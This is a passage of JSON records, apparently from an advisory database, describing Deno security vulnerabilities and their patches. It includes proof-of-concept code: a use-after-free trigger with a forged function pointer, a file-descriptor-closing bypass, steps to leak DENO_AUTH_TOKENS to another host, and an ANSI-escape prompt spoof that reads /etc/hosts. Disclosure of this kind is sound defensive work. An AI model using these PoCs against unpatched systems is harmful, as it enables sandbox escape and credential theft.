Deno.serve({ port: 3001, signal: ac.signal }, (req) =\u003e {\n  return new Response(null, {\n    status: 302,\n    headers: {\n      'location': 'http://localhost:3002/redirected'\n    },\n  })\n})\n\nconst server2 = Deno.serve({ port: 3002, signal: ac.signal }, (req) =\u003e {\n  const body = JSON.stringify({\n    url: req.url,\n    hasAuth: req.headers.has('authorization'),\n  })\n  return new Response(body, {\n    status: 200,\n    headers: {'content-type': 'application/json'},\n  })\n})\n\nasync function main() {\n  const response = await fetch(\"http://localhost:3001/\", {\n    headers: {authorization: 'Bearer foo'}\n  })\n  const body = await response.json()\n  \n  ac.abort()\n  \n  if (body.hasAuth) {\n    console.error('ERROR: Authorization header should not be present after cross-origin redirect')\n  } else {\n    console.log('SUCCESS: Authorization header is not present after cross-origin redirect')\n  }\n}\n\nsetTimeout(main, 500)\n```\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-01-06T22:27:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-f27p-cmv8-xhm6","https://nvd.nist.gov/vuln/detail/CVE-2025-21620","https://github.com/advisories/GHSA-f27p-cmv8-xhm6"],"source_kind":"github","identifiers":["GHSA-f27p-cmv8-xhm6","CVE-2025-21620"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2025-01-06T23:08:01.132Z","updated_at":"2026-09-03T07:06:48.496Z","epss_percentage":0.00514,"epss_percentile":0.4159,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.1.2","vulnerable_version_range":"\u003e= 2.0.0, \u003c 2.1.2"},{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.46.3"}],"purl":"pkg:cargo/deno"},{"ecosystem":"cargo","package_name":"deno_fetch","versions":[{"first_patched_version":"0.204.0","vulnerable_version_range":"\u003e= 0.0.1, \u003c 0.204.0"}],"purl":"pkg:cargo/deno_fetch"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mMjdwLWNtdjgteGhtNs4ABC_L/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yM3J4LWMzZzUtaHY5d84AA73I","url":"https://github.com/advisories/GHSA-23rx-c3g5-hv9w","title":"Deno permission escalation vulnerability via open of privileged files with missing `--deny` flag","description":"The Deno sandbox may be unexpectedly weakened by allowing file read/write access to privileged files in various locations on Unix and Windows platforms. For example, reading `/proc/self/environ` may provide access equivalent to `--allow-env`, and writing `/proc/self/mem` may provide access equivalent to `--allow-all`.\n\nUsers who grant read and write access to the entire filesystem may not realize that these access to these files may have additional, unintended consequences. The documentation did not reflect that this practice should be undertaken to increase the strength of the security sandbox. \n\n### Impact\n\nUsers who run code with `--allow-read` or `--allow-write` may unexpectedly end up granting additional permissions via file-system operations.\n\n### Patches\n\nDeno 1.43 and above require explicit `--allow-all` access to read or write `/etc`, `/dev` on unix platform (as well as `/proc` and `/sys` on linux platforms), and any path starting with `\\\\` on Windows.\n\n### Workarounds\n\nThe security sandbox in previous versions of Deno allows for denial of access to these files, but it requires an explicit addition of deny flags: `--deny-read=/dev --deny-read=/sys --deny-read=/proc --deny-read=/etc --deny-write=/dev --deny-write=/sys --deny-write=/proc --deny-write=/etc`. Note that symlinks in allowed locations may defeat this protection in earlier versions of Deno.\n\n### Reporters\n\nThis vulnerability was reported by a number of analysts. Thanks to [oliver@secfault-security.com](mailto:oliver@secfault-security.com), [finn@secfault-security.com](mailto:finn@secfault-security.com), @leesh3288, and @cristianstaicu for their reports and analysis.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-05-08T14:33:16.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.4,"cvss_vector":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-23rx-c3g5-hv9w","https://nvd.nist.gov/vuln/detail/CVE-2024-34346","https://github.com/advisories/GHSA-23rx-c3g5-hv9w"],"source_kind":"github","identifiers":["GHSA-23rx-c3g5-hv9w","CVE-2024-34346"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2024-05-08T15:05:24.185Z","updated_at":"2026-08-29T17:07:12.864Z","epss_percentage":0.00368,"epss_percentile":0.29527,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yM3J4LWMzZzUtaHY5d84AA73I","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yM3J4LWMzZzUtaHY5d84AA73I","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.43.1","vulnerable_version_range":"\u003c 1.43.1"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yM3J4LWMzZzUtaHY5d84AA73I/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zajI3LTU2M3YtMjh3Zs4AA5zR","url":"https://github.com/advisories/GHSA-3j27-563v-28wf","title":"*const c_void / ExternalPointer unsoundness leading to use-after-free","description":"### Summary\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, resulting in arbitrary code execution.\n\n\n### Details\n\n`*const c_void` and `ExternalPointer` (defined via `external!()` macros) types are used to represent `v8::External` wrapping arbitrary `void*` with an external lifetime. This is inherently unsafe as we are effectively eliding all Rust lifetime safety guarantees.\n\n`*const c_void` is trivially unsafe. `ExternalPointer` attempts to resolve this issue by wrapping the underlying pointer with a `usize`d marker ([`ExternalWithMarker\u003cT\u003e`](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L49)).\n\nHowever, the marker [relies on the randomness of PIE address (binary base address)](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L10) which is still trivially exploitable for a non-PIE binary. It is also equally exploitable on a PIE binary when an attacker is able to derandomize the PIE address. This is problematic as it escalates an information leak of the PIE address into an exploitable vulnerability.\n\nNote that an attacker able to control code executed inside the Deno runtime is very likely to be able to bypass ASLR with any means necessary (e.g. by chaining another vulnerability, or by using other granted permissions such as `--allow-read` to read `/proc/self/maps`).\n\n\n### PoC\n\nFor simplicity, we use Deno version 1.38.0 where streaming operations uses `*const c_void`. Testing environment is Docker image `denoland/deno:alpine-1.38.0@sha256:fe51a00f4fbbaf1e72b29667c3eeeda429160cef2342f22a92c3820020d41f38` although the exact versions shouldn't matter much if it's in 1.36.2 up to 1.38.0 (before `ExternalPointer` patch, refer Impact section for details)\n\n```js\nconst ops = Deno[Deno.internal].core.ops;\nconst rid = ops.op_readable_stream_resource_allocate();\nconst sink = ops.op_readable_stream_resource_get_sink(rid);\n\n// close\nops.op_readable_stream_resource_close(sink);\nops.op_readable_stream_resource_close(sink);\n\n// reclaim BoundedBufferChannelInner\nconst ab = new ArrayBuffer(0x8058);\nconst dv = new DataView(ab);\n\n// forge chunk contents\ndv.setBigUint64(0, 2n, true);\ndv.setBigUint64(0x8030, 0x1337c0d30000n, true);\n\n// trigger segfault\nDeno.close(rid);\n```\n\nBelow is the dmesg log after the crash. We see that Deno has segfaulted on `1337c0d30008`, which is +8 of what we have written at offset 0x8030. Note also that the dereferenced value will immediately be used as a function pointer, with the first argument dereferenced from offset 0x8038 - it is trivial to use this to build an end-to-end exploit.\n\n```text\n[ 6439.821046] deno[15088]: segfault at 1337c0d30008 ip 0000557b53e2fb3e sp 00007fffd485ac70 error 4 in deno[557b51714000+2d7f000] likely on CPU 12 (core 12, socket 0)\n[ 6439.821054] Code: 00 00 00 00 48 85 c0 74 03 ff 50 08 49 8b 86 30 80 00 00 49 8b be 38 80 00 00 49 c7 86 30 80 00 00 00 00 00 00 48 85 c0 74 03 \u003cff\u003e 50 08 48 ff 03 48 83 c4 08 5b 41 5e c3 48 8d 3d 0d 1a 59 fb 48\n```\n\nThe same vulnerability exists for `ExternalPointer` implementation, but now it is required for the attacker to either leak the PIE address somehow, or else exploit unexpected aliasing behavior of `v8::External` values. The latter has not been investigated in depth, but it is theoretically possible to alias the same underlying pointer to different `v8::External` on different threads (Workers) and exploit the concurrency (`RefCell` may break this though).\n\n\n### Impact\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, which is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.\n\nThis bug is **known to be exploitable** for both `*const c_void` and `ExternalPointer` implementations.\n\nAffected versions of Deno is from 1.36.2 up to latest.\n\n- [ext/web/stream_resource.rs](https://github.com/denoland/deno/blob/main/ext/web/stream_resource.rs):\n  - `*const c_void` introduced in 1.36.2\n  - Patched into `ExternalPointer` in 1.38.1\n- [ext/http/http_next.rs](https://github.com/denoland/deno/blob/main/ext/http/http_next.rs):\n  - `ExternalPointer` introduced in 1.38.2","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-03-06T17:04:29.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.4,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-3j27-563v-28wf","https://github.com/advisories/GHSA-3j27-563v-28wf"],"source_kind":"github","identifiers":["GHSA-3j27-563v-28wf","CVE-2024-27934"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2024-03-06T18:04:46.961Z","updated_at":"2026-08-29T17:07:52.204Z","epss_percentage":0.00392,"epss_percentile":0.32008,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zajI3LTU2M3YtMjh3Zs4AA5zR","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zajI3LTU2M3YtMjh3Zs4AA5zR","packages":[{"ecosystem":"cargo","package_name":"Deno","versions":[{"first_patched_version":"1.40.3","vulnerable_version_range":"\u003e= 1.36.2, \u003c 1.40.3"}],"purl":"pkg:cargo/Deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zajI3LTU2M3YtMjh3Zs4AA5zR/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02cTR3LTl4NTYtcm13cc4AA5zQ","url":"https://github.com/advisories/GHSA-6q4w-9x56-rmwq","title":"Deno arbitrary file descriptor close via `op_node_ipc_pipe()` leading to permission prompt bypass","description":"### Summary\n\nUse of raw file descriptors in `op_node_ipc_pipe()` leads to premature close of arbitrary file descriptors, allowing standard input to be re-opened as a different resource resulting in permission prompt bypass.\n\n\n### Details\n\nNode child_process IPC relies on the JS side to pass the raw IPC file descriptor to `op_node_ipc_pipe()`, which returns a `IpcJsonStreamResource` ID associated with the file descriptor. On closing the resource, the raw file descriptor is closed together.\n\nAlthough closing a file descriptor is seemingly a harmless task, this has been known to be exploitable:\n- With `--allow-read` and `--allow-write` permissions, one can open `/dev/ptmx` as stdin. This device happily accepts TTY ioctls and pipes anything written into it back to the reader. \n  - This has been presented in a hacking competition (WACON 2023 Quals \"dino jail\").\n  - However, the precondition of this challenge was heavily contrived: fd 0 has manually been closed by FFI and `setuid()` was used to drop permissions and deny access to `/proc` since global write permissions are usually equivalent to arbitrary code execution (`/proc/self/mem`).\n\nAs this vulnerability conveniently allows us to close stdin (fd 0) without any FFI, we can open any resource that when read returns `y`, `Y` or `A` as its first character ([runtimes/permissions/prompter.rs](https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L265)) to bypass the prompt.\n\nThere is a caveat however - all stdio/stdin/stderr streams are [locked](https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L214), after which [`clear_stdin()`](https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L220) is called. This invokes [`libc::tcflush(0, libc::TCIFLUSH)`](https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L99) which fails on a non-TTY file descriptor.\n\nThis can be exploited by widening the race window between `clear_stdin()` and the next [`stdin_lock.read_line()`](https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L256). Notably, the prompt message contains the requested resource name (path) which is filtered by [`strip_ansi_codes_and_ascii_control()`](https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L225). This is also concatenated by [`write!()`](https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L241) to make a single buffer printed out to stderr. Thus, if we request a very long resource name, the window will widen allowing us to easily and stably race another Worker that closes fd 0 and opens a resource starting with an `A\\n` within the race window.\n\nNote that attacker does not need any permissions to exploit this bug to a full permission prompt bypass, as Cache API can be used to create and open files with controlled content without any permissions. Refer to the Impact section for more details.\n\n\n### PoC\n\nTesting environment is Docker image `denoland/deno:alpine-1.39.0@sha256:95064390f2c115673762bfc4fe15b1a7f81c859038b8c02b277ede7cd8a2ccbf`.\n\nBelow PoC closes stdout (fd 1) and then prints two lines, one on stdout and one on stderr. Only the latter line is shown as stdout file descriptor is closed.\n\n```js\nconst ops = Deno[Deno.internal].core.ops;\n\n// open fd 1 as ipc stream resource\nconst rid = ops.op_node_ipc_pipe(1);\n\n// close resource \u0026 fd 1\nDeno.close(rid);\n\n// this should not be seen (stdout)\nconsole.log('not seen');\n\n// but this is seen (stderr)\nconsole.error('seen');\n```\n\nBelow is `/proc/$(pgrep deno)/fd` right after executing the last line of the above PoC. We see that fd 1 is indeed missing.\n\n```text\ntotal 0\ndr-x------ 2 root root 30 Dec 18 07:07 ./\ndr-xr-xr-x 9 root root  0 Dec 18 07:07 ../\nlrwx------ 1 root root 64 Dec 18 07:07 0 -\u003e /dev/pts/0\nl-wx------ 1 root root 64 Dec 18 07:07 10 -\u003e 'pipe:[159305]'\nlr-x------ 1 root root 64 Dec 18 07:07 11 -\u003e 'pipe:[159306]'\nl-wx------ 1 root root 64 Dec 18 07:07 12 -\u003e 'pipe:[159306]'\nlrwx------ 1 root root 64 Dec 18 07:07 13 -\u003e /deno-dir/dep_analysis_cache_v1\nl-wx------ 1 root root 64 Dec 18 07:07 14 -\u003e 'pipe:[159305]'\nl-wx------ 1 root root 64 Dec 18 07:07 15 -\u003e 'pipe:[159306]'\nlrwx------ 1 root root 64 Dec 18 07:07 16 -\u003e /deno-dir/node_analysis_cache_v1\nlrwx------ 1 root root 64 Dec 18 07:07 17 -\u003e /dev/pts/0\nlrwx------ 1 root root 64 Dec 18 07:07 18 -\u003e /dev/pts/0\nlrwx------ 1 root root 64 Dec 18 07:07 19 -\u003e /dev/pts/0\nlrwx------ 1 root root 64 Dec 18 07:07 2 -\u003e /dev/pts/0\nlrwx------ 1 root root 64 Dec 18 07:07 20 -\u003e 'anon_inode:[eventpoll]'\nlrwx------ 1 root root 64 Dec 18 07:07 21 -\u003e 'anon_inode:[eventfd]'\nlrwx------ 1 root root 64 Dec 18 07:07 22 -\u003e 'anon_inode:[eventpoll]'\nlrwx------ 1 root root 64 Dec 18 07:07 23 -\u003e 'socket:[159302]'\nlrwx------ 1 root root 64 Dec 18 07:07 24 -\u003e 'anon_inode:[eventpoll]'\nlrwx------ 1 root root 64 Dec 18 07:07 25 -\u003e 'anon_inode:[eventfd]'\nlrwx------ 1 root root 64 Dec 18 07:07 26 -\u003e 'anon_inode:[eventpoll]'\nlrwx------ 1 root root 64 Dec 18 07:07 27 -\u003e 'socket:[159302]'\nlrwx------ 1 root root 64 Dec 18 07:07 28 -\u003e 'socket:[159310]'\nlrwx------ 1 root root 64 Dec 18 07:07 29 -\u003e 'socket:[159308]'\nlrwx------ 1 root root 64 Dec 18 07:07 3 -\u003e 'anon_inode:[eventpoll]'\nlrwx------ 1 root root 64 Dec 18 07:07 30 -\u003e 'socket:[159309]'\nlrwx------ 1 root root 64 Dec 18 07:07 4 -\u003e 'anon_inode:[eventfd]'\nlrwx------ 1 root root 64 Dec 18 07:07 5 -\u003e 'anon_inode:[eventpoll]'\nlrwx------ 1 root root 64 Dec 18 07:07 6 -\u003e 'socket:[159302]'\nlrwx------ 1 root root 64 Dec 18 07:07 7 -\u003e 'socket:[159303]'\nlrwx------ 1 root root 64 Dec 18 07:07 8 -\u003e 'socket:[159302]'\nlr-x------ 1 root root 64 Dec 18 07:07 9 -\u003e 'pipe:[159305]'\n```\n\n\n### Impact\n\nUse of raw file descriptors in `op_node_ipc_pipe()` leads to premature close of arbitrary file descriptors. This allow standard input (fd 0) to be closed and re-opened for a different resource, which allows a silent permission prompt bypass. This is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.\n\nThis bug is **known to be exploitable** - there is a working exploit that achieves arbitrary code execution by bypassing prompts from zero permissions, additionally abusing the fact that Cache API lacks filesystem permission checks. The attack can be conducted silently as stderr can also be closed, suppressing all prompt outputs.\n\n\u003e Note that Deno's security model is currently described as follows:\n\u003e - All runtime I/O is considered to be privileged and must always be guarded by a runtime permission. This includes filesystem access, network access, etc.\n\u003e   - The only exception to this is runtime storage explosion attacks that are isolated to a part of the file system, caused by evaluated code (for example, caching big dependencies or no limits on runtime caches such as the Web Cache API).\n\u003e\n\u003e Although it is ambiguous if the fundamental lack of file system permission checks on Web Cache API is a vulnerability or not, the reporter have not reported this as a vulnerability assuming that this is a known risk (or a feature).\n\nAffected version of Deno is 1.39.0.\n\n- Introduced with commit 5a91a06\n- Fixed with commit 55fac9f\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-03-06T17:04:08.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.2,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-6q4w-9x56-rmwq","https://github.com/denoland/deno/commit/55fac9f5ead6d30996400e8597c969b675c5a22b","https://github.com/denoland/deno/commit/5a91a065b882215dde209baf626247e54c21a392","https://nvd.nist.gov/vuln/detail/CVE-2024-27933","https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L214","https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L220","https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L225","https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L241","https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L256","https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L265","https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L99","https://github.com/advisories/GHSA-6q4w-9x56-rmwq"],"source_kind":"github","identifiers":["GHSA-6q4w-9x56-rmwq","CVE-2024-27933"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2024-03-06T18:04:46.993Z","updated_at":"2026-08-29T17:07:52.205Z","epss_percentage":0.02276,"epss_percentile":0.81525,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cTR3LTl4NTYtcm13cc4AA5zQ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02cTR3LTl4NTYtcm13cc4AA5zQ","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.39.1","vulnerable_version_range":"= 1.39.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cTR3LTl4NTYtcm13cc4AA5zQ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01ZnJ3LTRyd3EteGhjcs4AA5zP","url":"https://github.com/advisories/GHSA-5frw-4rwq-xhcr","title":"Deno's improper suffix match testing for DENO_AUTH_TOKENS","description":"### Summary\n\nDeno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for `example.com` may be sent to `notexample.com`.\n\n### Details\n\n[auth_tokens.rs uses a simple ends_with check](https://github.com/denoland/deno/blob/3f4639c330a31741b0efda2f93ebbb833f4f95bc/cli/auth_tokens.rs#L89), which matches `www.deno.land` to a `deno.land` token as intended, but also matches `im-in-ur-servers-attacking-ur-deno.land` to `deno.land` tokens.\n\n### PoC\n\n- Set up a server that logs requests. RequestBin will do. For example, `denovulnpoc.example.com`.\n- Run `DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain`. For example, `DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com`\n- Observe that the token intended only for the truncated domain is sent to the full domain\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\nAnyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is affected.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-03-06T17:03:36.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-5frw-4rwq-xhcr","https://github.com/denoland/deno/commit/de23e3b60b066481cc390f459497d5bef42a899b","https://nvd.nist.gov/vuln/detail/CVE-2024-27932","https://github.com/denoland/deno/blob/3f4639c330a31741b0efda2f93ebbb833f4f95bc/cli/auth_tokens.rs#L89","https://github.com/advisories/GHSA-5frw-4rwq-xhcr"],"source_kind":"github","identifiers":["GHSA-5frw-4rwq-xhcr","CVE-2024-27932"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2024-03-06T18:04:47.013Z","updated_at":"2026-08-29T17:07:52.205Z","epss_percentage":0.00594,"epss_percentile":0.45565,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01ZnJ3LTRyd3EteGhjcs4AA5zP","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01ZnJ3LTRyd3EteGhjcs4AA5zP","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.40.4","vulnerable_version_range":"\u003e= 1.8.0, \u003c 1.40.4"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01ZnJ3LTRyd3EteGhjcs4AA5zP/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tNHBxLWZ2MnctNmhyd84AA5xp","url":"https://github.com/advisories/GHSA-m4pq-fv2w-6hrw","title":"Deno's deno_runtime vulnerable to interactive permission prompt spoofing via improper ANSI stripping","description":"### Summary\nA maliciously crafted permission request can show the spoofed permission prompt by inserting a broken ANSI escape sequence into the request contents.\n\n### Details\nIn [the patch for CVE-2023-28446](https://github.com/denoland/deno/commit/78d430103a8f6931154ddbbe19d36f3b8630286d), Deno is stripping any ANSI escape sequences from the permission prompt, but permissions given to the program are based on the contents that contain the ANSI escape sequences.\n\nFor example, requesting the read permission with `/tmp/hello\\u001b[/../../etc/hosts` as a path will display the `/tmp/hellotc/hosts` in the permission prompt, but the actual permission given to the program is `/tmp/hello\\u001b[/../../etc/hosts`, which is `/etc/hosts` after the normalization.\n\nThis difference allows a malicious Deno program to spoof the contents of the permission prompt.\n\n\n### PoC\nRun the following JavaScript and observe that `/tmp/hellotc/hosts` is displayed in the permission prompt instead of `/etc/hosts`, although Deno gives access to `/etc/hosts`.\n``` javascript\nconst permission = { name: \"read\", path: \"/tmp/hello\\u001b[/../../etc/hosts\" };\nawait Deno.permissions.request(permission);\nconsole.log(await Deno.readTextFile(\"/etc/hosts\"));\n```\n\n#### Expected prompt\n```\n┌ ⚠️  Deno requests read access to \"/etc/hosts\".\n├ Requested by `Deno.permissions.query()` API\n├ Run again with --allow-read to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all read permissions) \u003e\n```\n\n#### Actual prompt\n```\n┌ ⚠️  Deno requests read access to \"/tmp/hellotc/hosts\".\n├ Requested by `Deno.permissions.query()` API\n├ Run again with --allow-read to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all read permissions) \u003e\n\n```\n\n### Impact\nAny Deno program can spoof the content of the interactive permission prompt by inserting a broken ANSI code, which allows a malicious Deno program to display the wrong file path or program name to the user.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-03-05T20:54:14.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-m4pq-fv2w-6hrw","https://github.com/denoland/deno/commit/78d430103a8f6931154ddbbe19d36f3b8630286d","https://github.com/denoland/deno/commit/7e6b94231290020b55f1d08fb03ea8132781abc5","https://nvd.nist.gov/vuln/detail/CVE-2024-27936","https://github.com/advisories/GHSA-m4pq-fv2w-6hrw"],"source_kind":"github","identifiers":["GHSA-m4pq-fv2w-6hrw","CVE-2024-27936"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2024-03-05T21:04:54.551Z","updated_at":"2026-09-08T21:07:42.400Z","epss_percentage":0.00943,"epss_percentile":0.58753,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNHBxLWZ2MnctNmhyd84AA5xp","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tNHBxLWZ2MnctNmhyd84AA5xp","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.41.0","vulnerable_version_range":"\u003e= 1.32.1, \u003c 1.41.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNHBxLWZ2MnctNmhyd84AA5xp/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13cnF2LXBmNmotbXFqcM4AA5xo","url":"https://github.com/advisories/GHSA-wrqv-pf6j-mqjp","title":"Deno's Node.js Compatibility Runtime has Cross-Session Data Contamination","description":"### Summary\n\nA vulnerability in Deno's Node.js compatibility runtime allows for cross-session data contamination during simultaneous asynchronous reads from Node.js streams sourced from sockets or files. The issue arises from the re-use of a global buffer (BUF) in stream_wrap.ts used as a performance optimization to limit allocations during these asynchronous read operations. This can lead to data intended for one session being received by another session, potentially resulting in data corruption and unexpected behavior.\n\n### Details\n\nA bug in Deno's Node.js compatibility runtime results in data cross-reception during simultaneous asynchronous reads from Node.js network streams. When multiple independent network socket connections are involved, this vulnerability can be triggered. For instance, two separate server sockets that receive data from their respective client sockets and then echo the received data back to the client using Node.js streams may experience an issue where data from one socket may appear on another socket. Due to the improper isolation of the global buffer (`BUF`), data sent by one socket can end up being incorrectly received by another socket. Consequently, data intended for one session may be exposed to another session, potentially leading to data corruption and unexpected behavior.\n\nThis buffer was introduced as a performance optimization to avoid excessive allocations during network read operations.\n\nIn cases where the [net.Stream](https://nodejs.org/api/net.html) is connected to a remote server such as a database or key/value store such as Redis, this may result in a packet received on one connection being presented to another, causing data cross-contamination between multiple users and potentially leaking sensitive information.\n\nIt is important to note that this vulnerability does not affect Deno network streams created with the `Deno.listen` and `Deno.connect` APIs. \n\nThe impact of this issue may extend beyond node.js network streams, however, and may also affect asynchronous reads from non-network node.js Stream such as those created from files.\n\n### PoC\n\nhttps://github.com/denoland/deno/issues/20188\n\n### Impact\n\nThis affects all users of Deno that use the node.js compatibility layer for network communication or other streams, including packages that may require node.js libraries indirectly.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-03-05T20:49:14.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.2,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:L","references":["https://github.com/denoland/deno/security/advisories/GHSA-wrqv-pf6j-mqjp","https://github.com/denoland/deno/issues/20188","https://github.com/denoland/deno/commit/3e9fb8aafd9834ebacd27734cea4310caaf794c6","https://nvd.nist.gov/vuln/detail/CVE-2024-27935","https://github.com/advisories/GHSA-wrqv-pf6j-mqjp"],"source_kind":"github","identifiers":["GHSA-wrqv-pf6j-mqjp","CVE-2024-27935"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2024-03-05T21:04:54.577Z","updated_at":"2026-09-08T21:08:50.313Z","epss_percentage":0.00722,"epss_percentile":0.51658,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13cnF2LXBmNmotbXFqcM4AA5xo","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13cnF2LXBmNmotbXFqcM4AA5xo","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.36.3","vulnerable_version_range":"\u003e= 1.35.1, \u003c 1.36.3"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13cnF2LXBmNmotbXFqcM4AA5xo/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ocnFyLWp2OHctdjlqaM4AA5xa","url":"https://github.com/advisories/GHSA-hrqr-jv8w-v9jh","title":"Insufficient permission checking in `Deno.makeTemp*` APIs","description":"### Impact\n\nInsufficient validation of parameters in `Deno.makeTemp*` 